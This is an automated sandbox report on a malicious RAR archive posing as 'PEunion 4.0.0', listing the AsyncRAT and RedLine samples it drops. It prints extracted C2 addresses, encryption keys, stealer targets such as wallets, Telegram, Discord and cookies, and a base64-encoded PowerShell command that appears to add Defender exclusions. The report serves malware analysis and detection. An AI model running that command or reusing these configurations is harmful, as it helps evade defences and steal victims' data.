analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

PEunion 4.0.0.rar

Full analysis: https://app.any.run/tasks/fee89a2b-b34c-4543-b096-e93b60b57945
Verdict: Malicious activity
Threats:

AsyncRAT is a RAT that can monitor and remotely control infected systems. This malware was introduced on Github as a legitimate open-source remote administration software, but hackers use it for its many powerful malicious functions.

Malware Trends Tracker     >>>
Analysis date: April 01, 2023, 15:25:39
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
asyncrat
redline
Indicators:
MIME: application/x-rar
File info: RAR archive data, v4, os: Win32, flags: RecoveryRecordPresent
MD5:

5E2FD6EF638CE83AB9CF7C77754C7D28

SHA1:

B5B6447D5446B09EB0897608E31BD162A9B1F2B8

SHA256:

2FE3C8D7BBAF309D89FDF191BC6459FDD41FFA20FCB220E9A22739020DE6413C

SSDEEP:

196608:+E0487dnId95HeSWCTsovd5snNy5xNsyXqiP7pONeOnLrl6f93J8r/+J:648xId9FWCxdGNaNqiP7q/n16kro

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Application was dropped or rewritten from another process

      • Prunion.exe (PID: 2884)
      • 2.exe (PID: 3504)
      • 1.exe (PID: 3184)
      • 11.exe (PID: 1752)
      • 7.exe (PID: 1860)
      • 5.exe (PID: 3912)
      • 9.exe (PID: 2816)
      • 10.exe (PID: 5104)
      • 8.exe (PID: 39640)
      • PEunion.exe (PID: 42660)

    • ASYNCRAT detected by memory dumps

      • 1.exe (PID: 3184)

    • REDLINE detected by memory dumps

      • 2.exe (PID: 3504)
      • AppLaunch.exe (PID: 256552)

  • SUSPICIOUS

    • Reads the Internet Settings

      • Prunion.exe (PID: 2884)
      • powershell.exe (PID: 1204)

    • Base64-obfuscated command line is found

      • Prunion.exe (PID: 2884)

    • Starts POWERSHELL.EXE for commands execution

      • Prunion.exe (PID: 2884)

    • BASE64 encoded PowerShell command has been detected

      • Prunion.exe (PID: 2884)

    • Executable content was dropped or overwritten

      • Prunion.exe (PID: 2884)

    • Using PowerShell to operate with local accounts

      • powershell.exe (PID: 1204)

    • Starts CMD.EXE for commands execution

      • 2.exe (PID: 3504)
      • 10.exe (PID: 5104)

    • Connects to unusual port

      • AppLaunch.exe (PID: 258880)
      • AppLaunch.exe (PID: 111252)
      • AppLaunch.exe (PID: 256552)
      • AppLaunch.exe (PID: 104064)
      • AppLaunch.exe (PID: 53460)

  • INFO

    • Reads the computer name

      • Prunion.exe (PID: 2884)
      • 1.exe (PID: 3184)
      • 5.exe (PID: 3912)
      • AppLaunch.exe (PID: 256552)
      • AppLaunch.exe (PID: 258880)
      • AppLaunch.exe (PID: 53460)
      • AppLaunch.exe (PID: 111252)
      • AppLaunch.exe (PID: 26276)
      • AppLaunch.exe (PID: 104064)

    • Checks supported languages

      • Prunion.exe (PID: 2884)
      • 1.exe (PID: 3184)
      • 2.exe (PID: 3504)
      • 5.exe (PID: 3912)
      • 7.exe (PID: 1860)
      • 11.exe (PID: 1752)
      • 9.exe (PID: 2816)
      • 10.exe (PID: 5104)
      • PEunion.exe (PID: 42660)
      • 8.exe (PID: 39640)
      • AppLaunch.exe (PID: 258880)
      • AppLaunch.exe (PID: 256552)
      • AppLaunch.exe (PID: 26276)
      • AppLaunch.exe (PID: 53460)
      • AppLaunch.exe (PID: 111252)
      • AppLaunch.exe (PID: 104064)

    • Manual execution by a user

      • Prunion.exe (PID: 2884)
      • WinRAR.exe (PID: 2640)

    • Executable content was dropped or overwritten

      • WinRAR.exe (PID: 2640)
      • WinRAR.exe (PID: 2712)

    • The process checks LSA protection

      • powershell.exe (PID: 1204)
      • Prunion.exe (PID: 2884)
      • AppLaunch.exe (PID: 256552)
      • AppLaunch.exe (PID: 258880)
      • AppLaunch.exe (PID: 111252)
      • AppLaunch.exe (PID: 26276)
      • AppLaunch.exe (PID: 53460)
      • AppLaunch.exe (PID: 104064)

    • Create files in a temporary directory

      • Prunion.exe (PID: 2884)
      • powershell.exe (PID: 1204)

    • Reads security settings of Internet Explorer

      • powershell.exe (PID: 1204)

    • Reads settings of System Certificates

      • powershell.exe (PID: 1204)

    • Reads the machine GUID from the registry

      • AppLaunch.exe (PID: 256552)
      • AppLaunch.exe (PID: 258880)
      • AppLaunch.exe (PID: 26276)
      • AppLaunch.exe (PID: 111252)
      • AppLaunch.exe (PID: 53460)
      • AppLaunch.exe (PID: 104064)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

AsyncRat

(PID) Process(3184) 1.exe
BotnetNEW
Version0.5.7B
Options
AutoRuntrue
Mutexihouhh
InstallFolder%AppData%
BSoDtrue
AntiVMtrue
Certificates
Cert1MIIE4DCCAsigAwIBAgIQAMidQ/uiVx3CmiA2bTlSCzANBgkqhkiG9w0BAQ0FADARMQ8wDQYDVQQDDAY3N3k3eTcwIBcNMjIwMzE1MTAzNjI5WhgPOTk5OTEyMzEyMzU5NTlaMBExDzANBgNVBAMMBjc3eTd5NzCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAI96iWfOMlsJMCyF7E8P8+99XJ8W6E8hiszoeI5FbuuvYCEIPNqTrW62aCUclUx0qEIHXZNAtxrgpQ94aMstU0Pgafl/17CBGB0G...
Server_SignatureLfTwvY62obt2bnO1hsksW49uGmOTQsQ9t9ys/SBLljhn10cyR4y+Z2qG2tB2tm48xs0q0/Llrnqb9AetfL0pvYZkMVTZ7vQITIqBZQ/wAbnRKDxOgS06ioUALczKX9hciGxO0/oWnyLjGLojljKZ41bpfkQ8ymauO7dQWnteo7ojM4/zlgaVERD3xdKYEnQ8MauDJszCmYnziX1OxMhCZintO7UDjmabzYe/daaFGTjxzReSpVVw0MJBgmGbDMENLJL9Uw9Z1+kCLkzPzUkDqWLjm/4gDHlRPda3BlN+dR43...
Keys
AESbf630b2d7109edffafc8dec64242c74660f5a03a1c65d4153f070f9eda2d79fc
Saltbfeb1e56fbcd973bb219022430a57843003d5644d21e62b9d4f180e7e6c33941
Credentials
Protocolpastebin
URLhttps://pastebin.com/raw/mchxnAbT

RedLine

(PID) Process(3504) 2.exe
C2 (1)193.106.191.18:37572
Botnet@Miroskati
Err_msg
Auth_value7632632e4a60a2f35a2a92deeaa3ce8f
US (181)
LEnvironmentogiEnvironmentn DatEnvironmenta
Environment
WSystem.Texteb DatSystem.Texta
System.Text
CoCryptographyokieCryptographys
Cryptography
ExtGenericension CooGenerickies
Generic
OFileInfopeFileInfora GFileInfoX StabFileInfole
FileInfo
OpLinqera GLinqX
Linq
ApGenericpDaGenericta\RGenericoamiGenericng\
Network
Extension
UNKNOWN
cFileStreamredFileStreamit_cFileStreamardFileStreams
FileStream
\
Network\
Host
Port
:
User
Pass
cookies.sqlite
GetDirectories
Entity12
EnumerateDirectories
String.Replace
String.Remove
bcrFileStream.IOypt.dFileStream.IOll
FileStream.IO
BCrstring.EmptyyptOpestring.EmptynAlgorithmProvistring.Emptyder
string.Empty
BCruintyptCloseAlgorituinthmProvuintider
uint
BCrUnmanagedTypeyptDecrUnmanagedTypeypt
UnmanagedType
BCrhKeyyptDeshKeytroyKhKeyey
hKey
BCpszPropertyryptGepszPropertytPropepszPropertyrty
pszProperty
BCEncodingryptSEncodingetPrEncodingoperEncodingty
Encoding
BCrbMasterKeyyptImbMasterKeyportKbMasterKeyey
bMasterKey
windows-1251
AES
Microsoft Primitive Provider
ChainingModeGCM
AuthTagLength
ChainingMode
ObjectLength
KeyDataBlob
-
{0}
net.tcp://
/
localhost
7632632e4a60a2f35a2a92deeaa3ce8f
Authorization
ns1
UNKNWON
HTsYDiUGKRY6DGQXPCAsGSE1E1MdFRBFJxYlXA==
@Miroskati
Postillate
Yandex\YaAddon
asf
*wallet*
ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtu...
_
T
e
l
gr
am
.
ex
\TeEnvironmentlegraEnvironmentm DEnvironmentesktoEnvironmentp\tdEnvironmentata
1
String
Replace
string.Replace
%USERPFile.WriteROFILE%\AppFile.WriteData\RoamiFile.Writeng
File.Write
Handler
npvo*
%USERPserviceInterface.ExtensionROFILE%\ApserviceInterface.ExtensionpData\LocaserviceInterface.Extensionl
serviceInterface.Extension
ProldCharotonVoldCharPN
oldChar
nSystem.CollectionspvoSystem.Collections*
System.Collections
(
UNIQUE
cstringmstringd
string
/ProcessC Process
Process
|
"
Armenia
Azerbaijan
Belarus
Kazakhstan
Kyrgyzstan
Moldova
Tajikistan
Uzbekistan
Ukraine
Russia
https://api.ip.sb/ip
80
81
0.0.0.0
SELSystem.Windows.FormsECT * FRSystem.Windows.FormsOM WinSystem.Windows.Forms32_ProcSystem.Windows.Formsessor
System.Windows.Forms
roSystem.Linqot\CISystem.LinqMV2
System.Linq
SELSystem.LinqECT * FRSystem.LinqOM WinSystem.Linq32_VideoCoSystem.Linqntroller
AdapterRAM
Name
SOFTWARE\WOW6432Node\Clients\StartMenuInternet
SOFTWARE\Clients\StartMenuInternet
shell\open\command
Unknown Version
SELESystem.ManagementCT * FRSystem.ManagementOM WiSystem.Managementn32_DisSystem.ManagementkDrivSystem.Managemente
System.Management
SerialNumber
SELSystem.Text.RegularExpressionsECT * FRSystem.Text.RegularExpressionsOM Win32_PSystem.Text.RegularExpressionsrocess WSystem.Text.RegularExpressionshere SessSystem.Text.RegularExpressionsionId='
System.Text.RegularExpressions
'
FileSystem
SSystem.ELECT * FRSystem.OM WiSystem.n32_ProcSystem.ess WherSystem.e SessiSystem.onId='
System.
ExecutablePath
[
]
Concat0 MConcatb oConcatr Concat0
Concat
SELEMemoryCT * FMemoryROM WiMemoryn32_OperMemoryatingSMemoryystem
Memory
{0}{1}{2}
x32
x64
x86
SOFTWARE\Microsoft\Windows NT\CurrentVersion
ProductName
CSDVersion
Unknown
_[
The entered value cannot be less than 1 or greater than 20.
#F25D59
Segoe UI
#FFFFFF
#323A3D
Tahoma
#696969
#A0A0A0
Marlett
2
#C75050
#72767F
#FAFAFA
#DE5954
#F46662
#F68F84
#292C3D
#3C3F50
#747881
#2B3043
#7F838C
#AAABB0
Microsoft Sans Serif
(PID) Process(256552) AppLaunch.exe
C2 (1)79.137.192.9:19788
Botnet@Miroskati
Err_msg
Auth_valuec16799aa992748b357b66c7f81245e70
US (160)
LEnvironmentogiEnvironmentn DatEnvironmenta
Environment
WSystem.Texteb DatSystem.Texta
System.Text
CoCryptographyokieCryptographys
Cryptography
ExtGenericension CooGenerickies
Generic
OFileInfopeFileInfora GFileInfoX StabFileInfole
FileInfo
OpLinqera GLinqX
Linq
ApGenericpDaGenericta\RGenericoamiGenericng\
Network
Extension
UNKNOWN
.
1
cFileStreamredFileStreamit_cFileStreamardFileStreams
FileStream
\
Network\
Host
Port
:
User
Pass
cookies.sqlite
GetDirectories
Entity12
EnumerateDirectories
String.Replace
String.Remove
net.tcp://
/
localhost
c16799aa992748b357b66c7f81245e70
Authorization
ns1
HQ0CGygHOloiDxZCJAdRZjgDK1AdDQ5a
@Miroskati
Swine
Id3
EnumerateFiles
ExpandEnvironmentVariables
Id2
Id1
FullName
Replace
Directory
wa
l
et
d
a
t
*wallet*
_
T
e
gr
am
ex
\TeEnvironmentlegraEnvironmentm DEnvironmentesktoEnvironmentp\tdEnvironmentata
\Discord\Local Storage\leveldb
*.loSystem.Collections.Genericg
System.Collections.Generic
String
MyG
string.Replace
%USERPFile.WriteROFILE%\AppFile.WriteData\RoamiFile.Writeng
File.Write
Handler
npvo*
%USERPserviceInterface.ExtensionROFILE%\ApserviceInterface.ExtensionpData\LocaserviceInterface.Extensionl
serviceInterface.Extension
ProldCharotonVoldCharPN
oldChar
nSystem.CollectionspvoSystem.Collections*
System.Collections
Microsoft\Windоws
-
AddRange
%
(
UNIQUE
"
bcrFileStream.IOypt.dFileStream.IOll
FileStream.IO
BCrstring.EmptyyptOpestring.EmptynAlgorithmProvistring.Emptyder
string.Empty
BCruintyptCloseAlgorituinthmProvuintider
uint
BCrUnmanagedTypeyptDecrUnmanagedTypeypt
UnmanagedType
BCrbyte[]yptDesbyte[]troyKbyte[]ey
byte[]
BCpszPropertyryptGepszPropertytPropepszPropertyrty
pszProperty
BCEncodingryptSEncodingetPrEncodingoperEncodingty
Encoding
BCrbMasterKeyyptImbMasterKeyportKbMasterKeyey
bMasterKey
windows-1251
AES
Microsoft Primitive Provider
ChainingModeGCM
AuthTagLength
ChainingMode
ObjectLength
KeyDataBlob
{0}
|
https://api.ip.sb/ip
80
81
0.0.0.0
SELSystem.Windows.FormsECT * FRSystem.Windows.FormsOM WinSystem.Windows.Forms32_ProcSystem.Windows.Formsessor
System.Windows.Forms
roSystem.Linqot\CISystem.LinqMV2
System.Linq
SELSystem.LinqECT * FRSystem.LinqOM WinSystem.Linq32_VideoCoSystem.Linqntroller
AdapterRAM
Name
SOFTWARE\WOW6432Node\Clients\StartMenuInternet
SOFTWARE\Clients\StartMenuInternet
shell\open\command
Unknown Version
SELESystem.ManagementCT * FRSystem.ManagementOM WiSystem.Managementn32_DisSystem.ManagementkDrivSystem.Managemente
System.Management
SerialNumber
SELSystem.Text.RegularExpressionsECT * FRSystem.Text.RegularExpressionsOM Win32_PSystem.Text.RegularExpressionsrocess WSystem.Text.RegularExpressionshere SessSystem.Text.RegularExpressionsionId='
System.Text.RegularExpressions
'
FileSystem
SSystem.ELECT * FRSystem.OM WiSystem.n32_ProcSystem.ess WherSystem.e SessiSystem.onId='
System.
ExecutablePath
[
]
Concat0 MConcatb oConcatr Concat0
Concat
SELEMemoryCT * FMemoryROM WiMemoryn32_OperMemoryatingSMemoryystem
Memory
{0}{1}{2}
x32
x64
x86
SOFTWARE\Microsoft\Windows NT\CurrentVersion
ProductName
CSDVersion
Unknown
_[
No Malware configuration.

TRiD

.rar | RAR compressed archive (v-4.x) (58.3)
.rar | RAR compressed archive (gen) (41.6)

EXIF

ZIP

CompressedSize: 11823654
UncompressedSize: 11929703
OperatingSystem: Win32
ModifyDate: 2023:03:24 17:49:34
PackingMethod: Normal
ArchivedFileName: PEunion 4.0.0\PEunion 4.0.0.exe
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
69
Monitored processes
21
Malicious processes
6
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start winrar.exe winrar.exe prunion.exe powershell.exe no specs #ASYNCRAT 1.exe no specs #REDLINE 2.exe no specs 5.exe no specs 7.exe no specs 9.exe no specs 11.exe no specs 10.exe no specs 8.exe no specs peunion.exe no specs #REDLINE applaunch.exe applaunch.exe cmd.exe no specs applaunch.exe no specs cmd.exe no specs applaunch.exe applaunch.exe applaunch.exe

Process information

PID
CMD
Path
Indicators
Parent process
2712"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\Desktop\PEunion 4.0.0.rar"C:\Program Files\WinRAR\WinRAR.exe
explorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\usp10.dll
c:\windows\system32\comdlg32.dll
2640"C:\Program Files\WinRAR\WinRAR.exe" x -iext -ow -ver -- "C:\Users\admin\Desktop\PEunion 4.0.0\PEunion 4.0.0\PEunion 4.0.0.exe" "C:\Users\admin\Desktop\PEunion 4.0.0\PEunion 4.0.0\"C:\Program Files\WinRAR\WinRAR.exe
explorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
2884"C:\Users\admin\Desktop\PEunion 4.0.0\PEunion 4.0.0\Prunion.exe" C:\Users\admin\Desktop\PEunion 4.0.0\PEunion 4.0.0\Prunion.exe
explorer.exe
User:
admin
Integrity Level:
HIGH
Description:
PEunion
Exit code:
0
Version:
4,0,0,0
Modules
Images
c:\users\admin\desktop\peunion 4.0.0\peunion 4.0.0\prunion.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
1204"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAawBlACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAeQB4ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGMAegBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAeQBnACMAPgA="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePrunion.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\atl.dll
c:\windows\system32\gdi32.dll
3184"C:\Users\admin\AppData\Local\Temp\1.exe" C:\Users\admin\AppData\Local\Temp\1.exe
Prunion.exe
User:
admin
Company:
mirrored.to
Integrity Level:
HIGH
Description:
Mirrored.to v3.0.2
Exit code:
0
Version:
3.0.2.0
Modules
Images
c:\users\admin\appdata\local\temp\1.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\gdi32.dll
AsyncRat
(PID) Process(3184) 1.exe
BotnetNEW
Version0.5.7B
Options
AutoRuntrue
Mutexihouhh
InstallFolder%AppData%
BSoDtrue
AntiVMtrue
Certificates
Cert1MIIE4DCCAsigAwIBAgIQAMidQ/uiVx3CmiA2bTlSCzANBgkqhkiG9w0BAQ0FADARMQ8wDQYDVQQDDAY3N3k3eTcwIBcNMjIwMzE1MTAzNjI5WhgPOTk5OTEyMzEyMzU5NTlaMBExDzANBgNVBAMMBjc3eTd5NzCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAI96iWfOMlsJMCyF7E8P8+99XJ8W6E8hiszoeI5FbuuvYCEIPNqTrW62aCUclUx0qEIHXZNAtxrgpQ94aMstU0Pgafl/17CBGB0G...
Server_SignatureLfTwvY62obt2bnO1hsksW49uGmOTQsQ9t9ys/SBLljhn10cyR4y+Z2qG2tB2tm48xs0q0/Llrnqb9AetfL0pvYZkMVTZ7vQITIqBZQ/wAbnRKDxOgS06ioUALczKX9hciGxO0/oWnyLjGLojljKZ41bpfkQ8ymauO7dQWnteo7ojM4/zlgaVERD3xdKYEnQ8MauDJszCmYnziX1OxMhCZintO7UDjmabzYe/daaFGTjxzReSpVVw0MJBgmGbDMENLJL9Uw9Z1+kCLkzPzUkDqWLjm/4gDHlRPda3BlN+dR43...
Keys
AESbf630b2d7109edffafc8dec64242c74660f5a03a1c65d4153f070f9eda2d79fc
Saltbfeb1e56fbcd973bb219022430a57843003d5644d21e62b9d4f180e7e6c33941
Credentials
Protocolpastebin
URLhttps://pastebin.com/raw/mchxnAbT
3504"C:\Users\admin\AppData\Local\Temp\2.exe" C:\Users\admin\AppData\Local\Temp\2.exe
Prunion.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Modules
Images
c:\windows\system32\ntdll.dll
c:\users\admin\appdata\local\temp\2.exe
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\imm32.dll
RedLine
(PID) Process(3504) 2.exe
C2 (1)193.106.191.18:37572
Botnet@Miroskati
Err_msg
Auth_value7632632e4a60a2f35a2a92deeaa3ce8f
US (181)
LEnvironmentogiEnvironmentn DatEnvironmenta
Environment
WSystem.Texteb DatSystem.Texta
System.Text
CoCryptographyokieCryptographys
Cryptography
ExtGenericension CooGenerickies
Generic
OFileInfopeFileInfora GFileInfoX StabFileInfole
FileInfo
OpLinqera GLinqX
Linq
ApGenericpDaGenericta\RGenericoamiGenericng\
Network
Extension
UNKNOWN
cFileStreamredFileStreamit_cFileStreamardFileStreams
FileStream
\
Network\
Host
Port
:
User
Pass
cookies.sqlite
GetDirectories
Entity12
EnumerateDirectories
String.Replace
String.Remove
bcrFileStream.IOypt.dFileStream.IOll
FileStream.IO
BCrstring.EmptyyptOpestring.EmptynAlgorithmProvistring.Emptyder
string.Empty
BCruintyptCloseAlgorituinthmProvuintider
uint
BCrUnmanagedTypeyptDecrUnmanagedTypeypt
UnmanagedType
BCrhKeyyptDeshKeytroyKhKeyey
hKey
BCpszPropertyryptGepszPropertytPropepszPropertyrty
pszProperty
BCEncodingryptSEncodingetPrEncodingoperEncodingty
Encoding
BCrbMasterKeyyptImbMasterKeyportKbMasterKeyey
bMasterKey
windows-1251
AES
Microsoft Primitive Provider
ChainingModeGCM
AuthTagLength
ChainingMode
ObjectLength
KeyDataBlob
-
{0}
net.tcp://
/
localhost
7632632e4a60a2f35a2a92deeaa3ce8f
Authorization
ns1
UNKNWON
HTsYDiUGKRY6DGQXPCAsGSE1E1MdFRBFJxYlXA==
@Miroskati
Postillate
Yandex\YaAddon
asf
*wallet*
ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtu...
_
T
e
l
gr
am
.
ex
\TeEnvironmentlegraEnvironmentm DEnvironmentesktoEnvironmentp\tdEnvironmentata
1
String
Replace
string.Replace
%USERPFile.WriteROFILE%\AppFile.WriteData\RoamiFile.Writeng
File.Write
Handler
npvo*
%USERPserviceInterface.ExtensionROFILE%\ApserviceInterface.ExtensionpData\LocaserviceInterface.Extensionl
serviceInterface.Extension
ProldCharotonVoldCharPN
oldChar
nSystem.CollectionspvoSystem.Collections*
System.Collections
(
UNIQUE
cstringmstringd
string
/ProcessC Process
Process
|
"
Armenia
Azerbaijan
Belarus
Kazakhstan
Kyrgyzstan
Moldova
Tajikistan
Uzbekistan
Ukraine
Russia
https://api.ip.sb/ip
80
81
0.0.0.0
SELSystem.Windows.FormsECT * FRSystem.Windows.FormsOM WinSystem.Windows.Forms32_ProcSystem.Windows.Formsessor
System.Windows.Forms
roSystem.Linqot\CISystem.LinqMV2
System.Linq
SELSystem.LinqECT * FRSystem.LinqOM WinSystem.Linq32_VideoCoSystem.Linqntroller
AdapterRAM
Name
SOFTWARE\WOW6432Node\Clients\StartMenuInternet
SOFTWARE\Clients\StartMenuInternet
shell\open\command
Unknown Version
SELESystem.ManagementCT * FRSystem.ManagementOM WiSystem.Managementn32_DisSystem.ManagementkDrivSystem.Managemente
System.Management
SerialNumber
SELSystem.Text.RegularExpressionsECT * FRSystem.Text.RegularExpressionsOM Win32_PSystem.Text.RegularExpressionsrocess WSystem.Text.RegularExpressionshere SessSystem.Text.RegularExpressionsionId='
System.Text.RegularExpressions
'
FileSystem
SSystem.ELECT * FRSystem.OM WiSystem.n32_ProcSystem.ess WherSystem.e SessiSystem.onId='
System.
ExecutablePath
[
]
Concat0 MConcatb oConcatr Concat0
Concat
SELEMemoryCT * FMemoryROM WiMemoryn32_OperMemoryatingSMemoryystem
Memory
{0}{1}{2}
x32
x64
x86
SOFTWARE\Microsoft\Windows NT\CurrentVersion
ProductName
CSDVersion
Unknown
_[
The entered value cannot be less than 1 or greater than 20.
#F25D59
Segoe UI
#FFFFFF
#323A3D
Tahoma
#696969
#A0A0A0
Marlett
2
#C75050
#72767F
#FAFAFA
#DE5954
#F46662
#F68F84
#292C3D
#3C3F50
#747881
#2B3043
#7F838C
#AAABB0
Microsoft Sans Serif
3912"C:\Users\admin\AppData\Local\Temp\5.exe" C:\Users\admin\AppData\Local\Temp\5.exePrunion.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Modules
Images
c:\users\admin\appdata\local\temp\5.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
1860"C:\Users\admin\AppData\Local\Temp\7.exe" C:\Users\admin\AppData\Local\Temp\7.exePrunion.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Modules
Images
c:\users\admin\appdata\local\temp\7.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\apphelp.dll
c:\windows\microsoft.net\framework\v4.0.30319\applaunch.exe
2816"C:\Users\admin\AppData\Local\Temp\9.exe" C:\Users\admin\AppData\Local\Temp\9.exePrunion.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Modules
Images
c:\users\admin\appdata\local\temp\9.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\apphelp.dll
c:\windows\microsoft.net\framework\v4.0.30319\applaunch.exe
1752"C:\Users\admin\AppData\Local\Temp\11.exe" C:\Users\admin\AppData\Local\Temp\11.exePrunion.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Modules
Images
c:\users\admin\appdata\local\temp\11.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\apphelp.dll
c:\windows\microsoft.net\framework\v4.0.30319\applaunch.exe
Total events
13 532
Read events
13 248
Write events
284
Delete events
0

Modification events

(PID) Process:(2712) WinRAR.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\16D\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(2712) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:2
Value:
C:\Users\admin\Desktop\virtio_ivshmem_master_build.zip
(PID) Process:(2712) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:1
Value:
C:\Users\admin\Desktop\Win7-KB3191566-x86.zip
(PID) Process:(2712) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\Desktop\phacker.zip
(PID) Process:(2712) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(2712) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(2712) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
(PID) Process:(2712) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:mtime
Value:
100
(PID) Process:(2712) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\MainWin
Operation:writeName:Placement
Value:
